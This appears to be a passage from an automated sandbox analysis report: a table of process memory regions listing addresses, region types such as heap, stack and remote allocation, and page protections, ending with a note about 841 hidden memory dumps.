trusted library allocation
|
page read and write
|
||
|
20BD96F9000
|
heap
|
page read and write
|
||
|
20BD9757000
|
heap
|
page read and write
|
||
|
12EBCFE000
|
unkown
|
page readonly
|
||
|
327C000
|
trusted library allocation
|
page read and write
|
||
|
20BDA079000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
1D8B0A10000
|
heap
|
page read and write
|
||
|
7FFB113F0000
|
trusted library allocation
|
page read and write
|
||
|
1C93CD00000
|
heap
|
page read and write
|
||
|
20BD93BD000
|
heap
|
page read and write
|
||
|
1C93C3C0000
|
trusted library allocation
|
page read and write
|
||
|
1C941B12000
|
heap
|
page read and write
|
||
|
211958DA000
|
heap
|
page read and write
|
||
|
20BD9650000
|
remote allocation
|
page read and write
|
||
|
7FFB11570000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB11710000
|
trusted library allocation
|
page read and write
|
||
|
21195314000
|
heap
|
page read and write
|
||
|
87A957A000
|
stack
|
page read and write
|
||
|
12EC27E000
|
stack
|
page read and write
|
||
|
20BD97E0000
|
heap
|
page read and write
|
||
|
1C9417E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11790000
|
trusted library allocation
|
page read and write
|
||
|
211959F5000
|
heap
|
page read and write
|
||
|
20BD76E1000
|
heap
|
page read and write
|
||
|
20BD9FD2000
|
heap
|
page read and write
|
||
|
21195910000
|
heap
|
page read and write
|
||
|
87A97F4000
|
stack
|
page read and write
|
||
|
1C93C370000
|
unclassified section
|
page readonly
|
||
|
2381113B000
|
heap
|
page read and write
|
||
|
20BD9731000
|
heap
|
page read and write
|
||
|
1D897330000
|
heap
|
page read and write
|
||
|
51816FF000
|
stack
|
page read and write
|
||
|
211958D2000
|
heap
|
page read and write
|
||
|
327E000
|
trusted library allocation
|
page read and write
|
||
|
87A94FE000
|
stack
|
page read and write
|
||
|
1C941870000
|
trusted library allocation
|
page read and write
|
||
|
1D8AF9A5000
|
heap
|
page read and write
|
||
|
1C93C413000
|
heap
|
page read and write
|
||
|
211957B0000
|
heap
|
page read and write
|
||
|
20BD93F7000
|
heap
|
page read and write
|
||
|
7FFB118C0000
|
trusted library allocation
|
page read and write
|
||
|
20BD97AE000
|
heap
|
page read and write
|
||
|
20BD76A6000
|
heap
|
page read and write
|
||
|
1D897CBA000
|
trusted library allocation
|
page read and write
|
||
|
87A9A7E000
|
stack
|
page read and write
|
||
|
7FFB116B0000
|
trusted library allocation
|
page read and write
|
||
|
1C941B1F000
|
heap
|
page read and write
|
||
|
1D8959F5000
|
heap
|
page read and write
|
||
|
AA4A1FE000
|
stack
|
page read and write
|
||
|
7FFB114C2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB114D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
246AEFE000
|
unkown
|
page read and write
|
||
|
20BD9650000
|
remote allocation
|
page read and write
|
||
|
211958D2000
|
heap
|
page read and write
|
||
|
20BD9EA3000
|
heap
|
page read and write
|
||
|
20BD93DA000
|
heap
|
page read and write
|
||
|
1D8AFDC0000
|
heap
|
page read and write
|
||
|
1C941871000
|
trusted library allocation
|
page read and write
|
||
|
7FFB112F2000
|
trusted library allocation
|
page read and write
|
||
|
AA49CC1000
|
stack
|
page read and write
|
||
|
1D895B10000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page execute and read and write
|
||
|
21193954000
|
heap
|
page read and write
|
||
|
2FFE000
|
stack
|
page read and write
|
||
|
7FFB112F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB116F0000
|
trusted library allocation
|
page read and write
|
||
|
238110DC000
|
heap
|
page read and write
|
||
|
2119595A000
|
heap
|
page read and write
|
||
|
5D71000
|
trusted library allocation
|
page read and write
|
||
|
12EAEFE000
|
unkown
|
page readonly
|
||
|
20BD7672000
|
heap
|
page read and write
|
||
|
20BD93DB000
|
heap
|
page read and write
|
||
|
42AB000
|
trusted library allocation
|
page read and write
|
||
|
20BD761F000
|
heap
|
page read and write
|
||
|
20BD93C1000
|
heap
|
page read and write
|
||
|
20BD93BE000
|
heap
|
page read and write
|
||
|
2119591B000
|
heap
|
page read and write
|
||
|
1D8A79B6000
|
trusted library allocation
|
page read and write
|
||
|
7FFB114F0000
|
trusted library allocation
|
page read and write
|
||
|
20BD7649000
|
heap
|
page read and write
|
||
|
B76F3FE000
|
stack
|
page read and write
|
||
|
20BDA070000
|
heap
|
page read and write
|
||
|
20BD9785000
|
heap
|
page read and write
|
||
|
2380F1DD000
|
heap
|
page read and write
|
||
|
20BD9727000
|
heap
|
page read and write
|
||
|
12EAAFB000
|
stack
|
page read and write
|
||
|
1C93C502000
|
heap
|
page read and write
|
||
|
1C93C230000
|
unclassified section
|
page readonly
|
||
|
7FFB112D8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11290000
|
trusted library allocation
|
page read and write
|
||
|
238110FB000
|
heap
|
page read and write
|
||
|
5D5E000
|
trusted library allocation
|
page read and write
|
||
|
20BD7620000
|
heap
|
page read and write
|
||
|
1C93CC02000
|
heap
|
page read and write
|
||
|
87A98F8000
|
stack
|
page read and write
|
||
|
20BD93BE000
|
heap
|
page read and write
|
||
|
1C941B00000
|
heap
|
page read and write
|
||
|
21195BF1000
|
heap
|
page read and write
|
||
|
238110F0000
|
heap
|
page read and write
|
||
|
7FFB114B8000
|
trusted library allocation
|
page read and write
|
||
|
12D3000
|
trusted library allocation
|
page read and write
|
||
|
5FE0000
|
trusted library allocation
|
page read and write
|
||
|
21193942000
|
heap
|
page read and write
|
||
|
327A000
|
trusted library allocation
|
page read and write
|
||
|
20BD9A10000
|
heap
|
page read and write
|
||
|
1D897A62000
|
trusted library allocation
|
page read and write
|
||
|
1D8A7951000
|
trusted library allocation
|
page read and write
|
||
|
20BD9715000
|
heap
|
page read and write
|
||
|
7FFB112B0000
|
trusted library allocation
|
page read and write
|
||
|
238114A5000
|
heap
|
page read and write
|
||
|
20BDA082000
|
heap
|
page read and write
|
||
|
20BD7691000
|
heap
|
page read and write
|
||
|
3274000
|
trusted library allocation
|
page read and write
|
||
|
1D897F27000
|
trusted library allocation
|
page read and write
|
||
|
20BD9720000
|
heap
|
page read and write
|
||
|
1D897D1F000
|
trusted library allocation
|
page read and write
|
||
|
B76E7E5000
|
stack
|
page read and write
|
||
|
20BD93C5000
|
heap
|
page read and write
|
||
|
6230000
|
trusted library allocation
|
page execute and read and write
|
||
|
2380F1C6000
|
heap
|
page read and write
|
||
|
1C941AD4000
|
heap
|
page read and write
|
||
|
20BD769E000
|
heap
|
page read and write
|
||
|
20BDA0B8000
|
heap
|
page read and write
|
||
|
7FFB11640000
|
trusted library allocation
|
page read and write
|
||
|
1C941AD2000
|
heap
|
page read and write
|
||
|
20BD761A000
|
heap
|
page read and write
|
||
|
5D54000
|
trusted library allocation
|
page read and write
|
||
|
21195907000
|
heap
|
page read and write
|
||
|
1C941875000
|
trusted library allocation
|
page read and write
|
||
|
21195924000
|
heap
|
page read and write
|
||
|
7FFB118F0000
|
trusted library allocation
|
page read and write
|
||
|
238110B1000
|
heap
|
page read and write
|
||
|
1D895B70000
|
trusted library allocation
|
page read and write
|
||
|
20BD93B0000
|
heap
|
page read and write
|
||
|
20BDA00F000
|
heap
|
page read and write
|
||
|
20BD7672000
|
heap
|
page read and write
|
||
|
238113D0000
|
heap
|
page read and write
|
||
|
1C941A50000
|
heap
|
page read and write
|
||
|
6020000
|
trusted library allocation
|
page read and write
|
||
|
1D895840000
|
heap
|
page read and write
|
||
|
7FFB11620000
|
trusted library allocation
|
page read and write
|
||
|
16BC000
|
stack
|
page read and write
|
||
|
B76EFFF000
|
stack
|
page read and write
|
||
|
1D897460000
|
heap
|
page read and write
|
||
|
238111D1000
|
heap
|
page read and write
|
||
|
1D897C36000
|
trusted library allocation
|
page read and write
|
||
|
12EB4FE000
|
unkown
|
page readonly
|
||
|
170A9C55000
|
heap
|
page read and write
|
||
|
40C000
|
remote allocation
|
page execute and read and write
|
||
|
7FFB116E0000
|
trusted library allocation
|
page read and write
|
||
|
21195904000
|
heap
|
page read and write
|
||
|
87A9776000
|
stack
|
page read and write
|
||
|
2380F1E6000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
575D000
|
stack
|
page read and write
|
||
|
20BD97AE000
|
heap
|
page read and write
|
||
|
23811117000
|
heap
|
page read and write
|
||
|
1D897466000
|
heap
|
page read and write
|
||
|
12EB0FE000
|
unkown
|
page readonly
|
||
|
21193908000
|
heap
|
page read and write
|
||
|
1C9418B0000
|
trusted library allocation
|
page read and write
|
||
|
21195937000
|
heap
|
page read and write
|
||
|
1C9418A0000
|
trusted library allocation
|
page read and write
|
||
|
20BD763E000
|
heap
|
page read and write
|
||
|
1D8AFB90000
|
heap
|
page read and write
|
||
|
4241000
|
trusted library allocation
|
page read and write
|
||
|
21195930000
|
heap
|
page read and write
|
||
|
20BD93BE000
|
heap
|
page read and write
|
||
|
21195BF0000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
211958F0000
|
heap
|
page read and write
|
||
|
12C0000
|
trusted library allocation
|
page read and write
|
||
|
20BD9F5F000
|
heap
|
page read and write
|
||
|
6270000
|
trusted library allocation
|
page read and write
|
||
|
2119392B000
|
heap
|
page read and write
|
||
|
12EA9FE000
|
unkown
|
page readonly
|
||
|
7FFB11670000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11053000
|
trusted library allocation
|
page execute and read and write
|
||
|
20BD976F000
|
heap
|
page read and write
|
||
|
2119393A000
|
heap
|
page read and write
|
||
|
1C941B0A000
|
heap
|
page read and write
|
||
|
238110EC000
|
heap
|
page read and write
|
||
|
32B6000
|
trusted library allocation
|
page read and write
|
||
|
87A91EE000
|
stack
|
page read and write
|
||
|
51817FE000
|
stack
|
page read and write
|
||
|
AA49D8F000
|
stack
|
page read and write
|
||
|
7FFB117A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB112D4000
|
trusted library allocation
|
page read and write
|
||
|
1C941ABC000
|
heap
|
page read and write
|
||
|
21195900000
|
heap
|
page read and write
|
||
|
20BD767D000
|
heap
|
page read and write
|
||
|
20BD9715000
|
heap
|
page read and write
|
||
|
7FFB11630000
|
trusted library allocation
|
page read and write
|
||
|
6006000
|
trusted library allocation
|
page read and write
|
||
|
2119590C000
|
heap
|
page read and write
|
||
|
7FFB11067000
|
trusted library allocation
|
page read and write
|
||
|
20BD7672000
|
heap
|
page read and write
|
||
|
1C93C48C000
|
heap
|
page read and write
|
||
|
7FFB11760000
|
trusted library allocation
|
page read and write
|
||
|
2380F1BC000
|
heap
|
page read and write
|
||
|
2380F1DB000
|
heap
|
page read and write
|
||
|
1C93C390000
|
heap
|
page read and write
|
||
|
7FFB11690000
|
trusted library allocation
|
page read and write
|
||
|
B76EEFF000
|
stack
|
page read and write
|
||
|
5FF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11360000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11520000
|
trusted library allocation
|
page read and write
|
||
|
20BD96F9000
|
heap
|
page read and write
|
||
|
20BD93B1000
|
heap
|
page read and write
|
||
|
5D7D000
|
trusted library allocation
|
page read and write
|
||
|
20BD75B0000
|
heap
|
page read and write
|
||
|
1D8979EA000
|
trusted library allocation
|
page read and write
|
||
|
20BDA06C000
|
heap
|
page read and write
|
||
|
2380F1A0000
|
heap
|
page read and write
|
||
|
12EACFB000
|
stack
|
page read and write
|
||
|
21195958000
|
heap
|
page read and write
|
||
|
23811137000
|
heap
|
page read and write
|
||
|
20BD9EF9000
|
heap
|
page read and write
|
||
|
1434000
|
heap
|
page read and write
|
||
|
7FFB11740000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11100000
|
trusted library allocation
|
page read and write
|
||
|
20BD76E5000
|
heap
|
page read and write
|
||
|
1D8A79BA000
|
trusted library allocation
|
page read and write
|
||
|
87AA6CE000
|
stack
|
page read and write
|
||
|
135E000
|
stack
|
page read and write
|
||
|
6250000
|
heap
|
page read and write
|
||
|
211958F6000
|
heap
|
page read and write
|
||
|
20BD76E1000
|
heap
|
page read and write
|
||
|
20BD9E60000
|
heap
|
page read and write
|
||
|
20BD76E5000
|
heap
|
page read and write
|
||
|
170A9BC0000
|
heap
|
page read and write
|
||
|
AA4A27F000
|
stack
|
page read and write
|
||
|
20BD76A6000
|
heap
|
page read and write
|
||
|
5D82000
|
trusted library allocation
|
page read and write
|
||
|
1D8959D5000
|
heap
|
page read and write
|
||
|
20BD9905000
|
heap
|
page read and write
|
||
|
21195310000
|
heap
|
page read and write
|
||
|
1E68BA14000
|
trusted library allocation
|
page read and write
|
||
|
1D897A7E000
|
trusted library allocation
|
page read and write
|
||
|
20BD93B7000
|
heap
|
page read and write
|
||
|
1D897EE9000
|
trusted library allocation
|
page read and write
|
||
|
5D90000
|
heap
|
page read and write
|
||
|
20BD76F0000
|
heap
|
page read and write
|
||
|
20BD7684000
|
heap
|
page read and write
|
||
|
87AA548000
|
stack
|
page read and write
|
||
|
1C93C479000
|
heap
|
page read and write
|
||
|
20BD9F5F000
|
heap
|
page read and write
|
||
|
20BD93C6000
|
heap
|
page read and write
|
||
|
2380F1C0000
|
heap
|
page read and write
|
||
|
1D8AFA14000
|
heap
|
page read and write
|
||
|
7FFB11500000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11320000
|
trusted library allocation
|
page read and write
|
||
|
518114A000
|
stack
|
page read and write
|
||
|
7FFB112C0000
|
trusted library allocation
|
page read and write
|
||
|
20BD9720000
|
heap
|
page read and write
|
||
|
1D895A17000
|
heap
|
page read and write
|
||
|
7FFB112F5000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11860000
|
trusted library allocation
|
page read and write
|
||
|
7FFB113E0000
|
trusted library allocation
|
page read and write
|
||
|
20BD96CF000
|
heap
|
page read and write
|
||
|
20BD93CC000
|
heap
|
page read and write
|
||
|
170A9C60000
|
heap
|
page read and write
|
||
|
7FFB114FB000
|
trusted library allocation
|
page read and write
|
||
|
20BD769E000
|
heap
|
page read and write
|
||
|
12EA3FE000
|
unkown
|
page readonly
|
||
|
211958F1000
|
heap
|
page read and write
|
||
|
211959F1000
|
heap
|
page read and write
|
||
|
21195907000
|
heap
|
page read and write
|
||
|
1C9419F0000
|
remote allocation
|
page read and write
|
||
|
20BD7620000
|
heap
|
page read and write
|
||
|
20BD93CC000
|
heap
|
page read and write
|
||
|
20BD96D1000
|
heap
|
page read and write
|
||
|
20BD7685000
|
heap
|
page read and write
|
||
|
1E688001000
|
trusted library allocation
|
page read and write
|
||
|
2380F1CC000
|
heap
|
page read and write
|
||
|
21195918000
|
heap
|
page read and write
|
||
|
1C93C496000
|
heap
|
page read and write
|
||
|
20BDA069000
|
heap
|
page read and write
|
||
|
1C93D430000
|
trusted library section
|
page readonly
|
||
|
1E681E01000
|
trusted library allocation
|
page read and write
|
||
|
CB02AFF000
|
stack
|
page read and write
|
||
|
7FFB114E0000
|
trusted library allocation
|
page read and write
|
||
|
20BD9F5F000
|
heap
|
page read and write
|
||
|
1D8AF940000
|
heap
|
page read and write
|
||
|
20BD9ECD000
|
heap
|
page read and write
|
||
|
1C93D420000
|
trusted library section
|
page readonly
|
||
|
1D8959F7000
|
heap
|
page read and write
|
||
|
20BD976F000
|
heap
|
page read and write
|
||
|
5D50000
|
trusted library allocation
|
page read and write
|
||
|
20BD9900000
|
heap
|
page read and write
|
||
|
CB02BFE000
|
stack
|
page read and write
|
||
|
7FFB118D0000
|
trusted library allocation
|
page read and write
|
||
|
87AA74B000
|
stack
|
page read and write
|
||
|
5D56000
|
trusted library allocation
|
page read and write
|
||
|
1C93C4B0000
|
heap
|
page read and write
|
There are 841 hidden memdumps, click here to show them.